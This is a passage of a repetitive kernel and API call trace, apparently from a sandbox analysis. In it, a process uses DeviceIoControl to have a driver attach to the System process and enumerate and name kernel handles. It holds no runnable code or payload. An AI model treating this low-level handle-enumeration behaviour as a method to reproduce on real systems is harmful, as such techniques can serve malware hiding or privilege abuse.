(Object=0xfffffa8001850990) returned 0x7a [0241.312] ObQueryNameString (in: Object=0xfffffa8001f95f20, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.312] ObfDereferenceObject (Object=0xfffffa8001f95f20) returned 0x2 [0241.312] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.312] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.312] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.312] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.312] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.312] PsAcquireProcessExitSynchronization () returned 0x0 [0241.312] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.312] ObReferenceObjectByHandle (in: Handle=0xffffffff80000704, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034ebb90, HandleInformation=0x0) returned 0x0 [0241.312] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.312] PsReleaseProcessExitSynchronization () returned 0x2 [0241.312] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.312] ObQueryNameString (in: Object=0xfffffa80034ebb90, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.313] ObfDereferenceObject (Object=0xfffffa80034ebb90) returned 0x2 [0241.313] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.313] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.313] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.313] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.313] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.313] PsAcquireProcessExitSynchronization () returned 0x0 [0241.313] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.313] ObReferenceObjectByHandle (in: Handle=0xffffffff80000708, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed4050, HandleInformation=0x0) returned 0x0 [0241.313] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.313] PsReleaseProcessExitSynchronization () returned 0x2 [0241.313] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.313] ObQueryNameString (in: Object=0xfffffa8001ed4050, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.313] ObfDereferenceObject (Object=0xfffffa8001ed4050) returned 0x2 [0241.313] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.313] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.313] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.313] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.313] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.313] PsAcquireProcessExitSynchronization () returned 0x0 [0241.313] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.313] ObReferenceObjectByHandle (in: Handle=0xffffffff8000070c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038d52c0, HandleInformation=0x0) returned 0x0 [0241.313] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.313] PsReleaseProcessExitSynchronization () returned 0x2 [0241.313] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.313] ObQueryNameString (in: Object=0xfffffa80038d52c0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.313] ObfDereferenceObject (Object=0xfffffa80038d52c0) returned 0x2 [0241.313] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.313] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.314] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.314] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.314] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.314] PsAcquireProcessExitSynchronization () returned 0x0 [0241.314] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.314] ObReferenceObjectByHandle (in: Handle=0xffffffff80000710, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed37c0, HandleInformation=0x0) returned 0x0 [0241.314] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.314] PsReleaseProcessExitSynchronization () returned 0x2 [0241.314] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.314] ObQueryNameString (in: Object=0xfffffa8001ed37c0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.314] ObfDereferenceObject (Object=0xfffffa8001ed37c0) returned 0x2 [0241.314] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.314] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.314] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.314] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.314] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.314] PsAcquireProcessExitSynchronization () returned 0x0 [0241.314] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.314] ObReferenceObjectByHandle (in: Handle=0xffffffff80000714, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800398ca70, HandleInformation=0x0) returned 0x0 [0241.314] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.314] PsReleaseProcessExitSynchronization () returned 0x2 [0241.314] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.314] ObQueryNameString (in: Object=0xfffffa800398ca70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.314] ObfDereferenceObject (Object=0xfffffa800398ca70) returned 0x2 [0241.314] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.314] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.314] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.314] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.314] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.314] PsAcquireProcessExitSynchronization () returned 0x0 [0241.314] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.315] ObReferenceObjectByHandle (in: Handle=0xffffffff80000718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed3e50, HandleInformation=0x0) returned 0x0 [0241.315] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.315] PsReleaseProcessExitSynchronization () returned 0x2 [0241.315] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.315] ObQueryNameString (in: Object=0xfffffa8001ed3e50, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.315] ObfDereferenceObject (Object=0xfffffa8001ed3e50) returned 0x2 [0241.315] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.315] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.315] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.315] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.315] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.315] PsAcquireProcessExitSynchronization () returned 0x0 [0241.315] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.315] ObReferenceObjectByHandle (in: Handle=0xffffffff8000071c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039d2c90, HandleInformation=0x0) returned 0x0 [0241.315] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.315] PsReleaseProcessExitSynchronization () returned 0x2 [0241.315] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.315] ObQueryNameString (in: Object=0xfffffa80039d2c90, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.315] ObfDereferenceObject (Object=0xfffffa80039d2c90) returned 0x2 [0241.315] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.315] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.315] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.315] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.315] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.315] PsAcquireProcessExitSynchronization () returned 0x0 [0241.315] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.315] ObReferenceObjectByHandle (in: Handle=0xffffffff80000720, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed2690, HandleInformation=0x0) returned 0x0 [0241.315] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.315] PsReleaseProcessExitSynchronization () returned 0x2 [0241.315] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.315] ObQueryNameString (in: Object=0xfffffa8001ed2690, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.316] ObfDereferenceObject (Object=0xfffffa8001ed2690) returned 0x2 [0241.316] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.316] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.316] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.316] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.316] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.316] PsAcquireProcessExitSynchronization () returned 0x0 [0241.316] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.316] ObReferenceObjectByHandle (in: Handle=0xffffffff80000724, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ea4930, HandleInformation=0x0) returned 0x0 [0241.316] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.316] PsReleaseProcessExitSynchronization () returned 0x2 [0241.316] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.316] ObQueryNameString (in: Object=0xfffffa8001ea4930, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.316] ObfDereferenceObject (Object=0xfffffa8001ea4930) returned 0x2 [0241.316] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.316] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.316] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.316] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.316] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.316] PsAcquireProcessExitSynchronization () returned 0x0 [0241.316] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.316] ObReferenceObjectByHandle (in: Handle=0xffffffff80000728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed2d20, HandleInformation=0x0) returned 0x0 [0241.316] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.316] PsReleaseProcessExitSynchronization () returned 0x2 [0241.316] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.316] ObQueryNameString (in: Object=0xfffffa8001ed2d20, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.316] ObfDereferenceObject (Object=0xfffffa8001ed2d20) returned 0x2 [0241.316] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.316] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.316] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.316] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.317] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.317] PsAcquireProcessExitSynchronization () returned 0x0 [0241.317] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.317] ObReferenceObjectByHandle (in: Handle=0xffffffff8000072c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e813b0, HandleInformation=0x0) returned 0x0 [0241.317] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.317] PsReleaseProcessExitSynchronization () returned 0x2 [0241.317] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.317] ObQueryNameString (in: Object=0xfffffa8001e813b0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.317] ObfDereferenceObject (Object=0xfffffa8001e813b0) returned 0x2 [0241.317] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.317] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.317] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.317] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.317] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.317] PsAcquireProcessExitSynchronization () returned 0x0 [0241.317] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.317] ObReferenceObjectByHandle (in: Handle=0xffffffff80000730, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed1200, HandleInformation=0x0) returned 0x0 [0241.317] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.317] PsReleaseProcessExitSynchronization () returned 0x2 [0241.317] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.317] ObQueryNameString (in: Object=0xfffffa8001ed1200, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.317] ObfDereferenceObject (Object=0xfffffa8001ed1200) returned 0x2 [0241.317] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.317] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.317] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.317] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.317] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.317] PsAcquireProcessExitSynchronization () returned 0x0 [0241.317] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.317] ObReferenceObjectByHandle (in: Handle=0xffffffff80000734, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ecdd20, HandleInformation=0x0) returned 0x0 [0241.318] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.318] PsReleaseProcessExitSynchronization () returned 0x2 [0241.318] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.318] ObQueryNameString (in: Object=0xfffffa8001ecdd20, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.318] ObfDereferenceObject (Object=0xfffffa8001ecdd20) returned 0x2 [0241.318] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.318] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.318] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.318] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.318] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.318] PsAcquireProcessExitSynchronization () returned 0x0 [0241.318] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.318] ObReferenceObjectByHandle (in: Handle=0xffffffff80000738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed1890, HandleInformation=0x0) returned 0x0 [0241.318] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.318] PsReleaseProcessExitSynchronization () returned 0x2 [0241.318] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.318] ObQueryNameString (in: Object=0xfffffa8001ed1890, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.318] ObfDereferenceObject (Object=0xfffffa8001ed1890) returned 0x2 [0241.318] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0241.318] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0241.318] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0241.318] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0241.318] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0241.318] PsAcquireProcessExitSynchronization () returned 0x0 [0241.318] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0241.318] ObReferenceObjectByHandle (in: Handle=0xffffffff8000073c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ecd690, HandleInformation=0x0) returned 0x0 [0241.318] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0241.318] PsReleaseProcessExitSynchronization () returned 0x2 [0241.318] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0241.319] ObQueryNameString (in: Object=0xfffffa8001ecd690, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0241.319] 